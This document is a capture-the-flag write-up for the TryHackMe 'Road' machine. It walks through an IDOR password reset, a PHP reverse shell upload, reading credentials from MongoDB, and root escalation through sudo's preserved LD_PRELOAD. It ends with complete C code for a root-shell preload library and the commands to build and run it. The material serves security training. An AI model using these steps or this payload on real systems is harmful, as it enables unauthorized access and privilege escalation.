Road - TryHackMe


Recon and User Flag

First, we run an nmap scan and find that ports 22 (SSH) and 80 (HTTP) are open.

Visiting the website, there is a “Merchant Central” button that leads to an admin login page.

We can register our own user there.

After logging in, we see just an ordinary dashboard.

Under the “ResetUser” option, we can change our own password.

But what if we alter the request so that it targets another user?

To try that, we need to discover another username whose password we can change.

Looking at the profile settings, there is a change-profile-image function that only admins can use, and the page reveals a likely admin username: admin@sky.thm.

Let’s modify the change password request so that it targets this username instead of our own.

Apparently, it worked! The reset endpoint trusts the username supplied in the request rather than the account tied to the logged-in session, so any registered user can reset any other account’s password (a classic broken access control / IDOR).

Now we just log in as admin with the new password and get permission to update profile images, so we can upload a PHP reverse shell there.

But now we need to find where the uploaded file is stored.

Looking at the source code of the profile page, we find a comment revealing where the profile images are stored.

Directory listing is not permitted for that path, so we request the file directly at http://10.10.28.242/v2/profileimages/php-reverse-shell.php.

With a listener waiting, we catch the reverse shell and cat the user.txt file.


Webdeveloper Access

Enumerating listening ports from the shell, we see that port 27017 is open. This is the default port of MongoDB, which the initial nmap scan did not show because it is only listening locally.

Connecting to mongo, in the database "backup" and collection "user", we find the webdeveloper user's password.

With this password, we have SSH access as webdeveloper.


Root Flag

Doing further enumeration of our sudo rights, we see that we can run /usr/bin/sky_backup_utility as root and that the sudo policy preserves the LD_PRELOAD environment variable. Since LD_PRELOAD makes the dynamic loader map a library of our choosing into the process before it starts, we can run our own code as root and escalate our privileges.

First, we create a C file for our library.

Then we compile it as a shared object, execute /usr/bin/sky_backup_utility through sudo with LD_PRELOAD pointing at our library, and get the root flag.

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
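The writeup does not show the C file itself, so here is an added example of such a library (my code, not the original post's file). It assumes the library is built to /tmp/shell.so and that the sudo rule keeps LD_PRELOAD in the environment (env_keep). It uses a constructor attribute instead of a hand-written _init, which is why the -nostartfiles flag from the command above is not needed (it is harmless if you keep it). The payload only fires when it has actually been loaded through LD_PRELOAD into a process that already has euid 0, so loading it anywhere else does nothing.

```c
/* shell.c: LD_PRELOAD payload for the sky_backup_utility sudo rule.
 * Added example, not the writeup's original file. Assumed setup:
 *   - sudoers lets our user run /usr/bin/sky_backup_utility as root
 *     and keeps LD_PRELOAD in the environment (env_keep+=LD_PRELOAD)
 *   - the library is written to /tmp/shell.so
 *
 * Build:  gcc -fPIC -shared -o /tmp/shell.so shell.c
 * Use:    sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Decide whether the payload should fire: only when we were really
 * loaded via LD_PRELOAD and the process already runs with euid 0
 * (which sudo gives us). Kept as a pure function so it is testable. */
int preloaded_as_root(const char *ld_preload, uid_t euid)
{
    return ld_preload != NULL && ld_preload[0] != '\0' && euid == 0;
}

/* Runs when the dynamic loader maps this library, before the target's
 * main(). Equivalent to the classic hand-written _init() but does not
 * require -nostartfiles. */
__attribute__((constructor))
static void hijack(void)
{
    if (!preloaded_as_root(getenv("LD_PRELOAD"), geteuid()))
        return;

    /* Remove the variable so the shell we spawn (and its children) are
     * not preloaded with this library again. */
    unsetenv("LD_PRELOAD");

    /* Make the real ids root as well, so bash does not drop privileges. */
    if (setgid(0) != 0 || setuid(0) != 0)
        return;

    /* -p tells bash to keep privileged ids even if real != effective.
     * execl only returns on failure; in that case the target runs normally. */
    execl("/bin/bash", "bash", "-p", (char *)NULL);
}
```

After `sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility` the constructor replaces the backup utility with a root bash, and /root/root.txt can be read. The env_keep of LD_PRELOAD is the whole bug: sudo normally strips the LD_* variables precisely because any preserved library path becomes code execution as the target user.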

See ya =)

b1d0ws
